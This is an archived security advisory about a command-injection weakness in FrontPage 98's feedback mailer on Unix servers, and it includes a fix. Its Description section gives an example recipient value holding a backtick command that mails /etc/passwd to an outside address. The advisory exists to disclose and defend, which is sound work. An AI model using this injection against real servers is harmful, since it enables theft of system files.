TUCoPS :: Web :: Servers :: fpse5.htm

Front Page 98 retrieve arbitrary file by email
Vulnerability

    Front Page 98

Affected

    *NIX with FP

Description

    Markus Stumpf found following.  He noticed another weakness which
    is still present at least in FP98 with the version id:

        FPVersion="3.0.2.1330"

    When installing a server for Frontpage it creates a file (usually)
    /usr/local/frontpage/www.example.com:80.cnf.  In order to get the
    feedback bot working for sending feedback via eMail you can define
    within this file:

        SendmailCommand:/usr/sbin/sendmail %r

    The  "%r"  above   is  substituted  with   the  recipients   email
    address(es).  With this setting you are vulnerable, as creating  a
    feedback page with a recipient address of e.g.

        `/usr/bin/Mail -s 'password' nobody@example.com < /etc/passwd`

    will execute the command

        /usr/sbin/sendmail `/usr/bin/Mail -s 'password' nobody@example.com < /etc/passwd`

    and send the password file to nobody@example.com.

Solution

    To avoid  this tell  Frontpage to  use the  SMTP protocol  to send
    emails by using

        SMTPHost:mail.example.com

    and you may probably also use

        MailSender:webmaster@example.com

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH